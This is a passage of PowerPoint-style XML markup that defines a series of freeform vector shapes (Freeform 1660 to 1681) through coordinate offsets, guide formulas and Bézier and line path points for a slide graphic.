                      <a:pt x="133" y="0"/>
                      <a:pt x="247" y="38"/>
                      <a:pt x="321" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="396" y="234"/>
                      <a:pt x="402" y="354"/>
                      <a:pt x="335" y="4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9" name="Freeform 1660"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-5654" y="-4383"/>
                <a:ext cx="579" cy="655"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 205 w 245"/>
                  <a:gd name="T1" fmla="*/ 246 h 277"/>
                  <a:gd name="T2" fmla="*/ 49 w 245"/>
                  <a:gd name="T3" fmla="*/ 194 h 277"/>
                  <a:gd name="T4" fmla="*/ 41 w 245"/>
                  <a:gd name="T5" fmla="*/ 31 h 277"/>
                  <a:gd name="T6" fmla="*/ 196 w 245"/>
                  <a:gd name="T7" fmla="*/ 83 h 277"/>
                  <a:gd name="T8" fmla="*/ 205 w 245"/>
                  <a:gd name="T9" fmla="*/ 246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5" h="277">
                    <a:moveTo>
                      <a:pt x="205" y="246"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="277"/>
                      <a:pt x="95" y="254"/>
                      <a:pt x="49" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="135"/>
                      <a:pt x="0" y="61"/>
                      <a:pt x="41" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="0"/>
                      <a:pt x="151" y="23"/>
                      <a:pt x="196" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="241" y="142"/>
                      <a:pt x="245" y="215"/>
                      <a:pt x="205" y="2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0" name="Freeform 1661"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6154" y="-6117"/>
                <a:ext cx="2239" cy="600"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 480 h 600"/>
                  <a:gd name="T2" fmla="*/ 1790 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 600"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 121 h 600"/>
                  <a:gd name="T6" fmla="*/ 449 w 2239"/>
                  <a:gd name="T7" fmla="*/ 600 h 600"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 480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39" h="600">
                    <a:moveTo>
                      <a:pt x="0" y="480"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="48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1" name="Freeform 1662"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6154" y="-6525"/>
                <a:ext cx="1705" cy="2752"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 722 w 722"/>
                  <a:gd name="T1" fmla="*/ 71 h 1165"/>
                  <a:gd name="T2" fmla="*/ 457 w 722"/>
                  <a:gd name="T3" fmla="*/ 0 h 1165"/>
                  <a:gd name="T4" fmla="*/ 245 w 722"/>
                  <a:gd name="T5" fmla="*/ 334 h 1165"/>
                  <a:gd name="T6" fmla="*/ 0 w 722"/>
                  <a:gd name="T7" fmla="*/ 376 h 1165"/>
                  <a:gd name="T8" fmla="*/ 0 w 722"/>
                  <a:gd name="T9" fmla="*/ 971 h 1165"/>
                  <a:gd name="T10" fmla="*/ 117 w 722"/>
                  <a:gd name="T11" fmla="*/ 1003 h 1165"/>
                  <a:gd name="T12" fmla="*/ 173 w 722"/>
                  <a:gd name="T13" fmla="*/ 841 h 1165"/>
                  <a:gd name="T14" fmla="*/ 491 w 722"/>
                  <a:gd name="T15" fmla="*/ 948 h 1165"/>
                  <a:gd name="T16" fmla="*/ 565 w 722"/>
                  <a:gd name="T17" fmla="*/ 1123 h 1165"/>
                  <a:gd name="T18" fmla="*/ 722 w 722"/>
                  <a:gd name="T19" fmla="*/ 1165 h 1165"/>
                  <a:gd name="T20" fmla="*/ 722 w 722"/>
                  <a:gd name="T21" fmla="*/ 71 h 1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22" h="1165">
                    <a:moveTo>
                      <a:pt x="722" y="71"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="457" y="0"/>
                      <a:pt x="457" y="0"/>
                      <a:pt x="457" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="245" y="334"/>
                      <a:pt x="245" y="334"/>
                      <a:pt x="245" y="334"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="376"/>
                      <a:pt x="0" y="376"/>
                      <a:pt x="0" y="376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117" y="1003"/>
                      <a:pt x="117" y="1003"/>
                      <a:pt x="117" y="1003"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="936"/>
                      <a:pt x="127" y="876"/>
                      <a:pt x="173" y="841"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="256" y="778"/>
                      <a:pt x="398" y="826"/>
                      <a:pt x="491" y="948"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="534" y="1004"/>
                      <a:pt x="558" y="1066"/>
                      <a:pt x="565" y="1123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="722" y="1165"/>
                      <a:pt x="722" y="1165"/>
                      <a:pt x="722" y="1165"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="722" y="71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2" name="Freeform 1663"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6154" y="-5637"/>
                <a:ext cx="1672" cy="916"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1672"/>
                  <a:gd name="T1" fmla="*/ 0 h 916"/>
                  <a:gd name="T2" fmla="*/ 0 w 1672"/>
                  <a:gd name="T3" fmla="*/ 470 h 916"/>
                  <a:gd name="T4" fmla="*/ 1672 w 1672"/>
                  <a:gd name="T5" fmla="*/ 916 h 916"/>
                  <a:gd name="T6" fmla="*/ 1672 w 1672"/>
                  <a:gd name="T7" fmla="*/ 449 h 916"/>
                  <a:gd name="T8" fmla="*/ 0 w 1672"/>
                  <a:gd name="T9" fmla="*/ 0 h 9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72" h="916">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1672" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1672" y="44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3" name="Freeform 1664"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-5075" y="-7017"/>
                <a:ext cx="2436" cy="659"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 626 w 2436"/>
                  <a:gd name="T1" fmla="*/ 659 h 659"/>
                  <a:gd name="T2" fmla="*/ 2436 w 2436"/>
                  <a:gd name="T3" fmla="*/ 173 h 659"/>
                  <a:gd name="T4" fmla="*/ 1788 w 2436"/>
                  <a:gd name="T5" fmla="*/ 0 h 659"/>
                  <a:gd name="T6" fmla="*/ 0 w 2436"/>
                  <a:gd name="T7" fmla="*/ 492 h 659"/>
                  <a:gd name="T8" fmla="*/ 626 w 2436"/>
                  <a:gd name="T9" fmla="*/ 659 h 6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36" h="659">
                    <a:moveTo>
                      <a:pt x="626" y="659"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2436" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1788" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="659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4" name="Freeform 1665"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-5533" y="-6483"/>
                <a:ext cx="1039" cy="1044"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 472 w 1039"/>
                  <a:gd name="T1" fmla="*/ 0 h 1044"/>
                  <a:gd name="T2" fmla="*/ 1039 w 1039"/>
                  <a:gd name="T3" fmla="*/ 161 h 1044"/>
                  <a:gd name="T4" fmla="*/ 1039 w 1039"/>
                  <a:gd name="T5" fmla="*/ 1044 h 1044"/>
                  <a:gd name="T6" fmla="*/ 0 w 1039"/>
                  <a:gd name="T7" fmla="*/ 765 h 1044"/>
                  <a:gd name="T8" fmla="*/ 472 w 1039"/>
                  <a:gd name="T9" fmla="*/ 0 h 10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9" h="1044">
                    <a:moveTo>
                      <a:pt x="472" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1039" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1039" y="1044"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472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5" name="Freeform 1666"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-5727" y="-5633"/>
                <a:ext cx="307" cy="185"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 40 w 307"/>
                  <a:gd name="T1" fmla="*/ 12 h 185"/>
                  <a:gd name="T2" fmla="*/ 307 w 307"/>
                  <a:gd name="T3" fmla="*/ 185 h 185"/>
                  <a:gd name="T4" fmla="*/ 265 w 307"/>
                  <a:gd name="T5" fmla="*/ 173 h 185"/>
                  <a:gd name="T6" fmla="*/ 0 w 307"/>
                  <a:gd name="T7" fmla="*/ 0 h 185"/>
                  <a:gd name="T8" fmla="*/ 40 w 307"/>
                  <a:gd name="T9" fmla="*/ 12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7" h="185">
                    <a:moveTo>
                      <a:pt x="40" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="307" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="12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6" name="Freeform 1667"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-5687" y="-5633"/>
                <a:ext cx="267" cy="185"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 267 w 267"/>
                  <a:gd name="T1" fmla="*/ 185 h 185"/>
                  <a:gd name="T2" fmla="*/ 267 w 267"/>
                  <a:gd name="T3" fmla="*/ 149 h 185"/>
                  <a:gd name="T4" fmla="*/ 45 w 267"/>
                  <a:gd name="T5" fmla="*/ 0 h 185"/>
                  <a:gd name="T6" fmla="*/ 0 w 267"/>
                  <a:gd name="T7" fmla="*/ 12 h 185"/>
                  <a:gd name="T8" fmla="*/ 267 w 267"/>
                  <a:gd name="T9" fmla="*/ 18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7" h="185">
                    <a:moveTo>
                      <a:pt x="267" y="185"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="267" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="18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7" name="Freeform 1668"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-5854" y="-5992"/>
                <a:ext cx="212" cy="416"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 212"/>
                  <a:gd name="T1" fmla="*/ 416 h 416"/>
                  <a:gd name="T2" fmla="*/ 0 w 212"/>
                  <a:gd name="T3" fmla="*/ 57 h 416"/>
                  <a:gd name="T4" fmla="*/ 212 w 212"/>
                  <a:gd name="T5" fmla="*/ 0 h 416"/>
                  <a:gd name="T6" fmla="*/ 212 w 212"/>
                  <a:gd name="T7" fmla="*/ 359 h 416"/>
                  <a:gd name="T8" fmla="*/ 0 w 212"/>
                  <a:gd name="T9" fmla="*/ 416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2" h="416">
                    <a:moveTo>
                      <a:pt x="0" y="416"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41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8" name="Freeform 1669"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-5892" y="-5944"/>
                <a:ext cx="38" cy="368"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 38"/>
                  <a:gd name="T1" fmla="*/ 9 h 368"/>
                  <a:gd name="T2" fmla="*/ 0 w 38"/>
                  <a:gd name="T3" fmla="*/ 0 h 368"/>
                  <a:gd name="T4" fmla="*/ 0 w 38"/>
                  <a:gd name="T5" fmla="*/ 356 h 368"/>
                  <a:gd name="T6" fmla="*/ 38 w 38"/>
                  <a:gd name="T7" fmla="*/ 368 h 368"/>
                  <a:gd name="T8" fmla="*/ 38 w 38"/>
                  <a:gd name="T9" fmla="*/ 9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368">
                    <a:moveTo>
                      <a:pt x="38" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="368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9" name="Freeform 1670"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-5892" y="-6001"/>
                <a:ext cx="250" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 250 w 250"/>
                  <a:gd name="T1" fmla="*/ 9 h 66"/>
                  <a:gd name="T2" fmla="*/ 210 w 250"/>
                  <a:gd name="T3" fmla="*/ 0 h 66"/>
                  <a:gd name="T4" fmla="*/ 0 w 250"/>
                  <a:gd name="T5" fmla="*/ 57 h 66"/>
                  <a:gd name="T6" fmla="*/ 38 w 250"/>
                  <a:gd name="T7" fmla="*/ 66 h 66"/>
                  <a:gd name="T8" fmla="*/ 250 w 250"/>
                  <a:gd name="T9" fmla="*/ 9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0" h="66">
                    <a:moveTo>
                      <a:pt x="250" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="9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0" name="Freeform 1671"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6154" y="-4432"/>
                <a:ext cx="288" cy="276"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 122 w 122"/>
                  <a:gd name="T1" fmla="*/ 33 h 117"/>
                  <a:gd name="T2" fmla="*/ 0 w 122"/>
                  <a:gd name="T3" fmla="*/ 0 h 117"/>
                  <a:gd name="T4" fmla="*/ 0 w 122"/>
                  <a:gd name="T5" fmla="*/ 85 h 117"/>
                  <a:gd name="T6" fmla="*/ 117 w 122"/>
                  <a:gd name="T7" fmla="*/ 117 h 117"/>
                  <a:gd name="T8" fmla="*/ 122 w 122"/>
                  <a:gd name="T9" fmla="*/ 33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117">
                    <a:moveTo>
                      <a:pt x="122" y="3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08" y="68"/>
                      <a:pt x="122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1" name="Freeform 1672"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-4942" y="-7787"/>
                <a:ext cx="7211" cy="1937"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3144 w 7211"/>
                  <a:gd name="T1" fmla="*/ 0 h 1937"/>
                  <a:gd name="T2" fmla="*/ 7211 w 7211"/>
                  <a:gd name="T3" fmla="*/ 1094 h 1937"/>
                  <a:gd name="T4" fmla="*/ 4072 w 7211"/>
                  <a:gd name="T5" fmla="*/ 1937 h 1937"/>
                  <a:gd name="T6" fmla="*/ 0 w 7211"/>
                  <a:gd name="T7" fmla="*/ 846 h 1937"/>
                  <a:gd name="T8" fmla="*/ 3144 w 7211"/>
                  <a:gd name="T9" fmla="*/ 0 h 19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11" h="1937">
                    <a:moveTo>
                      <a:pt x="3144" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7211" y="1094"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4072" y="1937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3144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2" name="Freeform 1673"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-870" y="-6693"/>
                <a:ext cx="3139" cy="4122"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3139"/>
                  <a:gd name="T1" fmla="*/ 843 h 4122"/>
                  <a:gd name="T2" fmla="*/ 3139 w 3139"/>
                  <a:gd name="T3" fmla="*/ 0 h 4122"/>
                  <a:gd name="T4" fmla="*/ 3139 w 3139"/>
                  <a:gd name="T5" fmla="*/ 3281 h 4122"/>
                  <a:gd name="T6" fmla="*/ 0 w 3139"/>
                  <a:gd name="T7" fmla="*/ 4122 h 4122"/>
                  <a:gd name="T8" fmla="*/ 0 w 3139"/>
                  <a:gd name="T9" fmla="*/ 843 h 4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39" h="4122">
                    <a:moveTo>
                      <a:pt x="0" y="843"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3139" y="3281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="843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3" name="Freeform 1674"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1622" y="-6554"/>
                <a:ext cx="626" cy="168"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 626"/>
                  <a:gd name="T1" fmla="*/ 121 h 168"/>
                  <a:gd name="T2" fmla="*/ 454 w 626"/>
                  <a:gd name="T3" fmla="*/ 0 h 168"/>
                  <a:gd name="T4" fmla="*/ 626 w 626"/>
                  <a:gd name="T5" fmla="*/ 45 h 168"/>
                  <a:gd name="T6" fmla="*/ 173 w 626"/>
                  <a:gd name="T7" fmla="*/ 168 h 168"/>
                  <a:gd name="T8" fmla="*/ 0 w 626"/>
                  <a:gd name="T9" fmla="*/ 12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6" h="168">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="168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4" name="Freeform 1675"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1795" y="-6509"/>
                <a:ext cx="453" cy="288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 453"/>
                  <a:gd name="T1" fmla="*/ 288 h 288"/>
                  <a:gd name="T2" fmla="*/ 0 w 453"/>
                  <a:gd name="T3" fmla="*/ 123 h 288"/>
                  <a:gd name="T4" fmla="*/ 453 w 453"/>
                  <a:gd name="T5" fmla="*/ 0 h 288"/>
                  <a:gd name="T6" fmla="*/ 453 w 453"/>
                  <a:gd name="T7" fmla="*/ 168 h 288"/>
                  <a:gd name="T8" fmla="*/ 0 w 453"/>
                  <a:gd name="T9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3" h="288">
                    <a:moveTo>
                      <a:pt x="0" y="288"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="288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5" name="Freeform 1676"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1622" y="-6433"/>
                <a:ext cx="173" cy="212"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 173"/>
                  <a:gd name="T1" fmla="*/ 0 h 212"/>
                  <a:gd name="T2" fmla="*/ 0 w 173"/>
                  <a:gd name="T3" fmla="*/ 165 h 212"/>
                  <a:gd name="T4" fmla="*/ 173 w 173"/>
                  <a:gd name="T5" fmla="*/ 212 h 212"/>
                  <a:gd name="T6" fmla="*/ 173 w 173"/>
                  <a:gd name="T7" fmla="*/ 47 h 212"/>
                  <a:gd name="T8" fmla="*/ 0 w 173"/>
                  <a:gd name="T9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3" h="212">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="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6" name="Freeform 1677"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1171" y="-6433"/>
                <a:ext cx="624" cy="167"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 624"/>
                  <a:gd name="T1" fmla="*/ 120 h 167"/>
                  <a:gd name="T2" fmla="*/ 451 w 624"/>
                  <a:gd name="T3" fmla="*/ 0 h 167"/>
                  <a:gd name="T4" fmla="*/ 624 w 624"/>
                  <a:gd name="T5" fmla="*/ 47 h 167"/>
                  <a:gd name="T6" fmla="*/ 172 w 624"/>
                  <a:gd name="T7" fmla="*/ 167 h 167"/>
                  <a:gd name="T8" fmla="*/ 0 w 624"/>
                  <a:gd name="T9" fmla="*/ 12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4" h="167">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="167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7" name="Freeform 1678"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1343" y="-6386"/>
                <a:ext cx="452" cy="286"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 452"/>
                  <a:gd name="T1" fmla="*/ 286 h 286"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 120 h 286"/>
                  <a:gd name="T4" fmla="*/ 452 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 286"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 165 h 286"/>
                  <a:gd name="T8" fmla="*/ 0 w 452"/>
                  <a:gd name="T9" fmla="*/ 28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2" h="286">
                    <a:moveTo>
                      <a:pt x="0" y="286"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="165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8" name="Freeform 1679"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1171" y="-6313"/>
                <a:ext cx="172" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 172"/>
                  <a:gd name="T1" fmla="*/ 0 h 213"/>
                  <a:gd name="T2" fmla="*/ 0 w 172"/>
                  <a:gd name="T3" fmla="*/ 168 h 213"/>
                  <a:gd name="T4" fmla="*/ 172 w 172"/>
                  <a:gd name="T5" fmla="*/ 213 h 213"/>
                  <a:gd name="T6" fmla="*/ 172 w 172"/>
                  <a:gd name="T7" fmla="*/ 47 h 213"/>
                  <a:gd name="T8" fmla="*/ 0 w 172"/>
                  <a:gd name="T9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2" h="213">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="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9" name="Freeform 1680"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="717" y="-6313"/>
                <a:ext cx="626" cy="168"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 626"/>
                  <a:gd name="T1" fmla="*/ 123 h 168"/>
                  <a:gd name="T2" fmla="*/ 454 w 626"/>
                  <a:gd name="T3" fmla="*/ 0 h 168"/>
                  <a:gd name="T4" fmla="*/ 626 w 626"/>
                  <a:gd name="T5" fmla="*/ 47 h 168"/>
                  <a:gd name="T6" fmla="*/ 173 w 626"/>
                  <a:gd name="T7" fmla="*/ 168 h 168"/>
                  <a:gd name="T8" fmla="*/ 0 w 626"/>
                  <a:gd name="T9" fmla="*/ 123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6" h="168">
                    <a:moveTo>
                      <a:pt x="0" y="123"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="168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0" name="Freeform 1681"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="890" y="-6266"/>
                <a:ext cx="453" cy="289"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 453"/>
                  <a:gd name="T1" fmla="*/ 289 h 289"/>
                  <a:gd name="T2" fmla="*/ 0 w 453"/>
                  <a:gd name="T3" fmla="*/ 121 h 289"/>
                  <a:gd name="T4" fmla="*/ 453 w 453"/>
                  <a:gd name="T5" fmla="*/ 0 h 289"/>
                  <a:gd name="T6" fmla="*/ 453 w 453"/>
                  <a:gd name="T7" fmla="*/ 166 h 289"/>
                  <a:gd name="T8" fmla="*/ 0 w 453"/>
